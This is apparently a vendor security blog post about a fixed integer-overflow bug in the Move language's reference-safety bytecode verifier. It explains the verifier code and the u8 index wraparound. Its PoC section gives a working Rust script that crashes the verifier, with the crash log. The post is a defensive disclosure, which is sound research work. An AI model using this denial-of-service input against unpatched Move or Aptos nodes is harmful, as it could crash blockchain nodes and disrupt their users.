Numen

Logo

The Story of a High-Risk Vulnerability in Move Reference Safety Verify Module

0x0 Preface

Some time ago, we found a critical vulnerability in Aptos Movevm. After a bout of deep research, we found another high-risk vulnerability which is an integer overflow. But this time, it is extremely interesting.

So far, this vulnerability has beed fixed by Aptos Team with the git commit:https://github.com/move-language/move/commit/760937315ecc857bb4eb35f05193bbc639821514.
For those projects using the Move language , we recommend you to update your projects to the latest version as soon as possible to avoid being attacked.

We know that the Move language verifies the code unit before executing the bytecode. In the code unit verify it’s split into 4 steps. This bug occurs at reference_safety. We will be going more into detail about it below.

fn verify_common(&self) -> PartialVMResult<()> { 
        StackUsageVerifier::verify(&self.resolver, &self.function_view)?; 
        type_safety::verify(&self.resolver, &self.function_view)?; 
        locals_safety::verify(&self.resolver, &self.function_view)?; 
        reference_safety::verify(&self.resolver, &self.function_view, &self.name_def_map) 
    } 

This module defines the transfer functions for verifying the reference safety of a procedure body. The checks include (but are not limited to) verifying that there are no dangling references, accesses to mutable references are safe, and accesses to global storage references are safe.

Here is the verify entry-point, it will call analyze_function.

pub(crate) fn verify<'a>( 
    resolver: &'a BinaryIndexedView<'a>, 
    function_view: &FunctionView, 
    name_def_map: &'a HashMap<IdentifierIndex, FunctionDefinitionIndex>, 
) -> PartialVMResult<()> { 
    let initial_state = AbstractState::new(function_view); 
    let mut verifier = ReferenceSafetyAnalysis::new(resolver, function_view, name_def_map); 
    verifier.analyze_function(initial_state, function_view) 
} 

For the analyze_function, the function will be verified with each basic block, so what’s the basic block?

In the compiler construction, a basic block is a straight-line code sequence with no branches in except for the entry and no branches out except at the exit.

In Move language, how do we identify a basic block?

For the Move language, the basic block is determined by traversing the bytecode, finding all branch instructions, and loop instructions. You can see the core code below:

 // Create basic blocks 
        let mut blocks = Map::new(); 
        let mut entry = 0; 
        let mut exit_to_entry = Map::new(); 
        for pc in 0..code.len() { 
            let co_pc = pc as CodeOffset; 
 
            // Create a basic block 
            if Self::is_end_of_block(co_pc, code, &block_ids) { 
                let exit = co_pc; 
                exit_to_entry.insert(exit, entry); 
                let successors = Bytecode::get_successors(co_pc, code); 
                let bb = BasicBlock { exit, successors }; 
                blocks.insert(entry, bb); 
                entry = co_pc + 1; 
            } 
        } 
 
fn is_end_of_block(pc: CodeOffset, code: &[Bytecode], block_ids: &Set<BlockId>) -> bool { 
        pc + 1 == (code.len() as CodeOffset) || block_ids.contains(&(pc + 1)) 
    } 
    fn record_block_ids(pc: CodeOffset, code: &[Bytecode], block_ids: &mut Set<BlockId>) { 
        let bytecode = &code[pc as usize]; 
 
        if let Some(offset) = bytecode.offset() { 
            block_ids.insert(*offset); 
        } 
 
        if bytecode.is_branch() && pc + 1 < (code.len() as CodeOffset) { 
            block_ids.insert(pc + 1); 
        } 
    } 

Here is an example of a code block of the Move language. we can see there are 3 basic blocks. The branches are determined by instruction: BrTrue, Branch, Ret.

main() { 
L0: loc0: u64 
B0: 
 0: LdU64(42) 
 1: LdU64(0) 
 2: Gt 
 3: BrTrue(7) 
B1: 
 4: LdU64(2) 
 5: StLoc[0](loc0: u64) 
 6: Branch(9) 
B2: 
 7: LdU64(1) 
 8: StLoc[0](loc0: u64) 
B3: 
 9: Ret 
} 
} 

0x1 Reference Safety in Move

Move supports two types of references: immutable — defined with & (e.g. &T) and mutable — &mut (e.g. &mut T). You may use immutable (&) references to read data from structs and use mutable (&mut) to modify them. By using the proper type of references, you help maintain security and you should know whether this method changes the value or only reads.

Below is an example from the official Move tutorial:

script { 
    use {{sender}}::M; 
 
    fun main() { 
        let t = M::create(10); 
 
        // create a reference directly 
        M::change(&mut t, 20); 
 
        // or write reference to a variable 
        let mut_ref_t = &mut t; 
 
        M::change(mut_ref_t, 100); 
 
        // same with immutable ref 
        let value = M::value(&t); 
 
        // this method also takes only references 
        // printed value will be 100 
        0x1::Debug::print<u8>(&value); 
    } 
} 

In the example above, we can see the mut_ref_t is the mutable reference of the value t.

So, the Move reference safety module tries to confirm whether the reference is valid or not which by take the function as the unit, scanning the basic blocks in the function, and judging whether all reference operations are legal through bytecode instructions verification.

The figure below shows the routine in which it verifies the safety of the reference.

The state here is AbstractState which contains the borrow graph and locals of which both of them are used to secure references.

pub(crate) struct AbstractState { 
    current_function: Option<FunctionDefinitionIndex>, 
    locals: BTreeMap<LocalIndex, AbstractValue>, 
    borrow_graph: BorrowGraph, 
    num_locals: usize, 
    next_id: usize, 

borrow_graph is a graph representing the relationship between locals references.

We can see from above figure, there is a pre state which includes locals and borrow graph (L ,BG) and then executing the basic block will generate a post state with the (L’,BG’), and then will merge the state before and after to update the blocks state and propagate postcondition of this block to successor blocks. This is like the Sea of Nodes optimization in V8 turbofan.

The below code is the main loop corresponding to the figure above. First, execute the block code (It will return an AnalysisError if executing the instruction is unsuccessful) and then try to merge the pre state and post state by determining whether the join_result is changed or not. If it is changed and the current block contains an edge point (which means there is a loop ), it will jump back to the beginning of the loop, in the next round will still execute this block until the post state is equal to pre state or abort by some error.

 let post_state = self.execute_block(block_id, pre_state, function_view)?; 
            let mut next_block_candidate = function_view.cfg().next_block(block_id); 
            // propagate postcondition of this block to successor blocks 
            for successor_block_id in function_view.cfg().successors(block_id) { 
                match inv_map.get_mut(successor_block_id) { 
                    Some(next_block_invariant) => { 
                        let join_result = { 
                            let old_pre = &mut next_block_invariant.pre; 
                            old_pre.join(&post_state) 
                        }; 
                        match join_result { 
                            JoinResult::Unchanged => { 
                                // Pre is the same after join. Reanalyzing this block would produce 
                                // the same post 
                            } 
                            JoinResult::Changed => { 
                                // If the cur->successor is a back edge, jump back to the beginning 
                                // of the loop, instead of the normal next block 
                                if function_view 
                                    .cfg() 
                                    .is_back_edge(block_id, *successor_block_id) 
                                { 
                                    next_block_candidate = Some(*successor_block_id); 
                                } 
                            } 
                        } 
                    } 

How do we judge whether the joinResult is changed or unchanged?

fn join(&mut self, state: &AbstractState) -> JoinResult { 
        let joined = Self::join_(self, state); 
        assert!(joined.is_canonical()); 
        assert!(self.num_locals == joined.num_locals); 
        let locals_unchanged = self 
            .iter_locals() 
            .all(|idx| self.locals.get(&idx) == joined.locals.get(&idx)); 
        let borrow_graph_unchanged = self.borrow_graph.leq(&joined.borrow_graph); 
        if locals_unchanged && borrow_graph_unchanged { 
            JoinResult::Unchanged 
        } else { 
            *self = joined; 
            JoinResult::Changed 
        } 
    } 

Through the above code, we can know whether the join result has changed or not by judging whether the relationship between locals and borrow relationship has changed or not. The join_ function here is used for updating the locals and borrow graph state.

With the join_ code below, line 6 is to initialize a new locals Map, line 9 is used to iterate all the index in the locals if the all value is None, before and after executing the block so you don’t insert to the new locals maps. If before the state has value, post state is None, we need to release the brow_graph id, which means to eliminate the borrow relationship of the value. The opposite is also the same. In particular, when both values exist and are the same, insert them into the new map like the lines 30–33 and then merge the borrow_graph at line 38.

pub fn join_(&self, other: &Self) -> Self { 
        assert!(self.current_function == other.current_function); 
        assert!(self.is_canonical() && other.is_canonical()); 
        assert!(self.next_id == other.next_id); 
        assert!(self.num_locals == other.num_locals); 
        let mut locals = BTreeMap::new(); 
        let mut self_graph = self.borrow_graph.clone(); 
        let mut other_graph = other.borrow_graph.clone(); 
        for local in self.iter_locals() { 
            let self_value = self.locals.get(&local); 
            let other_value = other.locals.get(&local); 
            match (self_value, other_value) { 
                // Unavailable on both sides, nothing to add 
                (None, None) => (), 
 
                (Some(v), None) => { 
                    // A reference exists on one side, but not the other. Release 
                    if let AbstractValue::Reference(id) = v { 
                        self_graph.release(*id); 
                    } 
                } 
                (None, Some(v)) => { 
                    // A reference exists on one side, but not the other. Release 
                    if let AbstractValue::Reference(id) = v { 
                        other_graph.release(*id); 
                    } 
                } 
 
                // The local has a value on each side, add it to the state 
                (Some(v1), Some(v2)) => { 
                    assert!(v1 == v2); 
                    assert!(!locals.contains_key(&local)); 
                    locals.insert(local, *v1); 
                } 
            } 
        } 
 
        let borrow_graph = self_graph.join(&other_graph); 
        let current_function = self.current_function; 
        let next_id = self.next_id; 
        let num_locals = self.num_locals; 
 
        Self { 
            current_function, 
            locals, 
            borrow_graph, 
            num_locals, 
            next_id, 
        } 
    } 
} 

From above we can see self.iter_locals() is the nums of the locals. And note this local include not only the function’s real locals but also parameters.

0x2 The Vulnerability

Here we have crossed all the codes related to the vulnerability, have you found it?

If you can’t find the vulnerability, it matters not. I will be going through the vulnerability-triggering process in detail below.

First in the blew code if the parameters length add locals length bigger than 256. There seems to be no problem right?

 let num_locals = function_view.parameters().len() + function_view.locals().len(); 

But this function will return Iterator with the item type u8.

  fn iter_locals(&self) -> impl Iterator<Item = LocalIndex> { 
        0..self.num_locals as LocalIndex 
    } 

So in the function join_() is function_view.parameters().len() and function_view.locals().len() combined value is bigger than 256.

In the code,for local in self.iter_locals(), the local variable is of type u8. After 256 iterations, it will cause an overflow. After the overflow, the value of local is 8.

Seems the developers only checked the locals+parameter length in the Move modules code , ignored the Script.

0x3 Move Overflow to DoS

We know there is a main loop to scan the code block and after calling the execute_block function and joining the state. If the move code exists a loop will jump to the block beginning to execute again.

So if we make a loop code block and exploit the overflow to change the state of the block, it makes the new locals map in the AbstractState object Differently from before, and then executes the block again with the function execute_block function, we know this function analyzes the code bytecode and gives access the locals, so if the reference value offset does not exist in the new AbstractState local’s map, it will lead to a DoS.

After auditing the code I found that by using the MoveLoc/CopyLoc/FreeRef opcode, we can achieve this goal.

Here let us see the copy_loc function which is the code called by execute_block function in the file path:

move/language/move-bytecode-verifier/src/reference_safety/abstract_state.rs

In line 287, the code tries to get the local value by the LocalIndex as parameter and if the LocalIndex does not exist, it will lead to panic, Imagation, when the node executes this evil code, will cause the whole node to crash.

0x4 PoC

Here is the PoC, of which you can reproduce in the git commit:add615b64390ea36e377e2a575f8cb91c9466844

fn PoC(){
  
     let sigs = (0..132)
    .map(|_|  Reference(Box::new(U64)))
    .collect::<Vec<_>>();
    let script = CompiledScript {
    version:5,
    module_handles:vec![],   
    struct_handles:vec![],
    function_handles:vec![],
    function_instantiations:vec![],
   signatures: vec![Signature(sigs)],
    identifiers:vec![],
    address_identifiers:vec![],
    constant_pool:vec![],
    metadata:vec![
        Metadata {
            key:vec! [],
            value: vec![],
        },
    ],
    code: CodeUnit {
        locals: SignatureIndex(0),
        code: vec![CopyLoc(57), StLoc(57), CopyLoc(57), StLoc(41), Branch(0)],
    },
    type_parameters:vec![],
    parameters:SignatureIndex(0),



};
let res=crate::verify_script(&script);
}

This is the crash log:

thread ‘regression_tests::reference_analysis::PoC’ panicked at ‘called `Option::unwrap()` on a `None` value’, language/move-bytecode-verifier/src/reference_safety/abstract_state.rs:287:39
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace

The DoS trigger Steps:

we can see the code block is a no-condition branch, and every time it executes the last instruction branch(0), it will jump back to the first instruction so it will call the execute_block and join function multiple times.

1. First time In here we set the parameters to SignatureIndex(0), locals to SignatureIndex(0) will lead the num_locals 132*2=264. So after calling the

for local in self.iter_locals() 

Leading new locals length to be 264–256=8

2. The Second time when executing the execute_block function and executing the first instruction copy_local(57), the 57 is the offset of the locals that need to push to the stack but this time locals only with the length 8, offset 57 does not exist, so this will cause the get(57).unwrap() function to return nothing and panic.

0x5 Summary

This is the whole story about this vulnerability. From it, we learn that:

First, this vulnerability shows that there is no code that is absolutely safe. The Move language does perform a good static verification before the code is executed, but just like this vulnerability, the previous boundary check can be completely bypassed through the overflow vulnerability.

Secondly,code audit is very important, as programmers can be negligent sometimes. As the leaders of Move language security, we will continue to dig deep into the security issues of Move.

The third point is that for Move language, we recommend that language designers add more check codes to prevent unexpected situations happen.

Currently, the Move language mainly performs a series of security checks in the verification stage, but I think this will not suffice. Once the verification is bypassed, there is not too much security reinforcement in the runtime stage, which will lead to further hazards being deepened, causing more serious problems.

Finally , we would like to tell you that we discovered another new vulnerability in the Move language. Detailed analysis will be disclosed soon. Please keep following us to get the latest update.

Numen Cyber Labs is committed to facilitating the safe development of Web 3.0. We are dedicated to the security of the blockchain ecosystem, as well as operating systems & browser/mobile security. We regularly disseminate analyses on topics such as these, please stay tuned or visit our blog here for more!

This blog was originally published on our Medium Account.

Share:

More Posts